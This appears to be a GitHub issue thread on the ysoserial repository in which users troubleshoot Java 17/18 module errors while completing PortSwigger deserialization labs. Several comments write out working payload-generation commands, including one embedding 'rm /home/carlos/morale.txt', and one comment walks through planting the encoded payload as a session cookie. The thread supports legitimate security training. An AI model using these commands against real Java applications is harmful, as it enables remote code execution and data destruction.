Comments (11)
I also stumbled over this issue while doing the Portswigger Labs. However, I didn't want to have a second java installation on my system. I found a way of making it work with Java 17 simply by shifting around the arguments of the call.
On the Portswigger page, they give the following hint for Java 17 users:
java -jar ysoserial-all.jar \
--add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED \
--add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED \
--add-opens=java.base/java.net=ALL-UNNAMED \
--add-opens=java.base/java.util=ALL-UNNAMED \
[payload] '[command]'
However, I still got only the normal startup prompt:
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Y SO SERIAL?
Usage: java -jar ysoserial-[version]-all.jar [payload] '[command]'
Available payload types:
[List of payloads here]
Since it looked as if ysoserial didn't recognize the arguments correctly, I finally came up with this order, which worked fine in Kali:
java \
--add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED \
--add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED \
--add-opens=java.base/sun.reflect.annotation=ALL-UNNAMED \
-jar ./ysoserial.jar <payload> <command>
Hope this helps someone :)
from ysoserial.
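Added example, not part of the comment above or of ysoserial: the `java` launcher hands every word after `-jar <file>` to the application's `main()`, so `--add-opens` placed there never reaches the JVM, which is why the reordered command works. `misplaced_jvm_opts` is a hypothetical helper name, and the sample command line is constructed from the placeholders quoted in the thread.

```shell
#!/bin/sh
# Print every --add-opens / --add-exports flag that appears after
# "-jar <file>" (or after a main class name) and is therefore passed to
# the application instead of being interpreted by the JVM.
misplaced_jvm_opts() {
    state=opts                      # opts -> value | jarfile -> app
    [ "$#" -gt 0 ] && shift         # drop the launcher name ("java")
    for arg in "$@"; do
        case $state in
            value)   state=opts ;;  # value of a two-word JVM option
            jarfile) state=app ;;   # the jar path; application args follow
            app)
                case $arg in
                    --add-opens|--add-opens=*|--add-exports|--add-exports=*)
                        printf '%s\n' "$arg" ;;
                esac ;;
            opts)
                case $arg in
                    -jar) state=jarfile ;;
                    --add-opens|--add-exports|-cp|-classpath|--class-path)
                        state=value ;;   # next word is this option's value
                    -*) ;;               # any other single-word JVM option
                    *)  state=app ;;     # main class name; app args follow
                esac ;;
        esac
    done
}

# Constructed sample: flags placed after -jar, as in the hint quoted above.
misplaced_jvm_opts java -jar ysoserial-all.jar \
    --add-opens=java.base/java.net=ALL-UNNAMED \
    --add-opens=java.base/java.util=ALL-UNNAMED '[payload]' '[command]'
```

An empty result means every module flag sits before `-jar` and will be applied by the JVM.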
THIS IS THE SOLUTION FOR LINUX:
This solution worked for me. I'm doing a PortSwigger lab and I need this software to work. Here you can find, step by step, how I fixed it.
- Install java 11
sudo apt-get install openjdk-11-jdk
- Add Java 11 to PATH variable. To add the Java 11 installation directory to the PATH variable, you can open the .bashrc or .bash_profile file in your home directory using a text editor. For example, you can use the following command to open the .bashrc file:
nano ~/.bashrc
- In the open file, add the following line to the end:
export PATH="/usr/lib/jvm/java-11-openjdk-amd64/bin:$PATH"
- Save and exit nano
- Restart the terminal with the following command
source ~/.bashrc
- Execute ysoserial. Example:
java -jar ysoserial-all.jar CommonsCollections4 'rm /home/carlos/morale.txt' | base64
- You should see the following output on the first line:
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Alternative and easy way:
sudo apt update -y
sudo apt install openjdk-11-jdk
sudo update-alternatives --config java
java --version
from ysoserial.
BTW, to whoever is still struggling with that particular lab or ysoserial, I recommend using Java 8. Here is how it worked for me (Linux):
- Download Java 8 from here https://jdk.java.net/java-se-ri/8-MR5
tar xvf openjdk-bla-bla-bla.tar.gz
/home/user/Downloads/java-se-8u43-ri/bin/java -jar ysoserial-all.jar CommonsCollections4 'rm /home/carlos/morale.txt' | base64 > cookie.txt
- Remove white spaces from the cookie.txt file (use online tools, or you can do it manually)
- Paste your cookie as wiener's cookie
- Before sending the request, don't forget to URL-encode all characters (with Burp, select the pasted cookie, right-click, Convert selection > URL > URL-encode all characters)
- Send the request
Hope it helps ;)
from ysoserial.
Same issue with Java 18
$ java --version
openjdk 18.0.2 2022-07-19
OpenJDK Runtime Environment (build 18.0.2+10)
OpenJDK 64-Bit Server VM (build 18.0.2+10, mixed mode, sharing)
$ java -jar ysoserial.jar CommonsCollections1 calc.exe
Error while generating or serializing payload
java.lang.reflect.InaccessibleObjectException: Unable to make sun.reflect.annotation.AnnotationInvocationHandler(java.lang.Class,java.util.Map) accessible: module java.base does not "opens sun.reflect.annotation" to unnamed module @7fbd2524
at java.base/java.lang.reflect.AccessibleObject.checkCanSetAccessible(AccessibleObject.java:354)
at java.base/java.lang.reflect.AccessibleObject.checkCanSetAccessible(AccessibleObject.java:297)
at java.base/java.lang.reflect.Constructor.checkCanSetAccessible(Constructor.java:191)
at java.base/java.lang.reflect.Constructor.setAccessible(Constructor.java:184)
at ysoserial.payloads.util.Reflections.setAccessible(Reflections.java:26)
at ysoserial.payloads.util.Reflections.getFirstCtor(Reflections.java:55)
at ysoserial.payloads.util.Gadgets.createMemoizedInvocationHandler(Gadgets.java:72)
at ysoserial.payloads.util.Gadgets.createMemoitizedProxy(Gadgets.java:67)
at ysoserial.payloads.CommonsCollections1.getObject(CommonsCollections1.java:71)
at ysoserial.payloads.CommonsCollections1.getObject(CommonsCollections1.java:43)
at ysoserial.GeneratePayload.main(GeneratePayload.java:34)
from ysoserial.
@Anawak, thanks bro, your solution worked for PortSwigger lab no. 5. For Java 17 users:
java \
--add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED \
--add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED \
--add-opens=java.base/sun.reflect.annotation=ALL-UNNAMED \
-jar ./ysoserial-all.jar CommonsCollections4 'rm /home/carlos/morale.txt' | base64
from ysoserial.
OK, but how can I run ysoserial.jar with another version of Java?
When I run ysoserial I get these errors:
Error while generating or serializing payload
$ java -jar ysoserial.jar CommonsCollections4 'Payload'
java.lang.IllegalAccessError: class ysoserial.payloads.util.Gadgets (in unnamed module @0x4015e7ec) cannot access class com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl (in module java.xml) because module java.xml does not export com.sun.org.apache.xalan.internal.xsltc.trax to unnamed module @0x4015e7ec
at ysoserial.payloads.util.Gadgets.createTemplatesImpl(Gadgets.java:102)
at ysoserial.payloads.CommonsCollections4.getObject(CommonsCollections4.java:32)
at ysoserial.payloads.CommonsCollections4.getObject(CommonsCollections4.java:26)
at ysoserial.GeneratePayload.main(GeneratePayload.java:34)
I found out that these errors happen only with Java 17. I saw some people facing the same problem online. When I ran it again on Java 15 it worked. More info:
$ java --version
openjdk 17.0.6 2023-01-17
OpenJDK Runtime Environment (build 17.0.6+10-Debian-1)
OpenJDK 64-Bit Server VM (build 17.0.6+10-Debian-1, mixed mode, sharing)
from ysoserial.
7. true
I also did it for the PortSwigger lab; I did it with Java 15.
from ysoserial.
For anyone still wanting to use Java 17, it is possible through the --add-opens option in java. See #176 for more details, with a script I made that does this automatically in a comment there.
from ysoserial.
I also stumbled over this issue while doing the Portswigger Labs. However, I didn't want to have a second java installation on my system. I found a way of making it work with Java 17 simply by shifting around the arguments of the call. On the Portswigger page, they give the following hint for Java 17 users:
java -jar ysoserial-all.jar \
--add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED \
--add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED \
--add-opens=java.base/java.net=ALL-UNNAMED \
--add-opens=java.base/java.util=ALL-UNNAMED \
[payload] '[command]'
However, I still got only the normal startup prompt:
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Y SO SERIAL?
Usage: java -jar ysoserial-[version]-all.jar [payload] '[command]'
Available payload types:
[List of payloads here]
Since it looked as if ysoserial didn't recognize the arguments correctly, I finally came up with this order, which worked fine in Kali:
java \
--add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED \
--add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED \
--add-opens=java.base/sun.reflect.annotation=ALL-UNNAMED \
-jar ./ysoserial.jar <payload> <command>
Hope this helps someone :)
Worked like a charm for me! I used Kali Linux v2023.3 with Java v17.0.8 to solve PortSwigger's lab
Thanks for sharing, you've saved me hours of further research & testing.
from ysoserial.
Duplicate of #176
from ysoserial.
Thanks bro, your solution worked for PortSwigger lab no. 5. For Java 17 users:
java \
--add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED \
--add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED \
--add-opens=java.base/sun.reflect.annotation=ALL-UNNAMED \
-jar ./ysoserial-all.jar CommonsCollections4 'rm /home/carlos/morale.txt'|base64 >tee.txt
from ysoserial.